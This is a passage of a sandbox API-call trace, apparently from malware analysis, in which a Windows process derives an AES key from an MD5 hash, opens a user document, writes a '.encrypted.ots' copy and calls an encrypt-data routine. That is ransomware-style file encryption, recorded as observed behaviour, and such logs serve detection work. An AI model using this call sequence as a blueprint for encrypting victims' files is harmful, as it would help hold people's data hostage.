(in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.716] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.716] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.716] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0035.716] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0035.716] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0035.716] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.716] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0035.716] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.717] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.717] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.717] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.717] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0035.717] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.717] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.717] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.717] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0035.717] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.717] CryptHashData (hHash=0x7c2240, pbData=0x7c9798, dwDataLen=0x100, dwFlags=0x1) returned 1 [0035.717] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.717] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.717] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.717] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.717] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0035.717] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0035.717] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0035.717] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.717] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0035.717] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.717] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.717] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.718] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.718] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.718] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.718] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0035.718] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.718] CryptDestroyHash (hHash=0x7c2240) returned 1 [0035.718] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.718] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.718] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.718] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.718] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.718] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jrhg4bbw8x\\ol52nfgjkpyhfqmjctg.ots"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0035.718] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.718] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0035.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0035.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0035.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0035.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0035.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0035.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0035.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0035.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0035.719] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0035.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0035.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0035.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0035.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0035.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0035.719] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0035.719] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0035.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0035.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0035.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0035.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0035.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0035.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0035.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0035.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0035.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0035.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0035.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0035.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0035.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0035.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0035.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0035.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0035.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0035.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0035.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0035.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0035.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0035.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0035.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0035.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0035.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0035.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xf0) returned 0x7c9798 [0035.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0035.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8558 [0035.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0035.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8600 [0035.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c9798 | out: hHeap=0x770000) returned 1 [0035.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0035.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0035.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0035.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0035.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0035.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0035.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0035.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0035.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8558 [0035.720] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jrhg4bbw8x")) returned 0x10 [0035.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0035.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8600 | out: hHeap=0x770000) returned 1 [0035.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0035.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0035.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0035.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0035.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0035.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0035.721] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.encrypted.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jrhg4bbw8x\\ol52nfgjkpyhfqmjctg.encrypted.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0035.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0035.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0035.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0035.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0035.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0035.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0035.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0035.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0035.721] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0035.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0035.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0035.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0035.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0035.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0035.722] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0035.722] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0035.722] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0035.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0035.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0035.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0035.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0035.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0035.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0035.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0035.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0035.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0035.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0035.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0035.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0035.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0035.723] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0035.723] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0035.725] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x6907, lpOverlapped=0x0) returned 1 [0035.725] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0035.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0035.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0035.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0035.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x16907) returned 0x955018 [0035.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0035.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0035.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0035.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0035.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0035.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0035.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x16907) returned 0x96b928 [0035.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0035.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.727] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0035.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0035.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0035.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0035.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0035.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x16907) returned 0x955018 [0035.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0035.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0035.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0035.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0035.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.727] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0035.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0035.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0035.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0035.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0035.728] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0035.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0035.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0035.728] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0035.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0035.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da258 [0035.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0035.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0035.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0035.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0035.728] 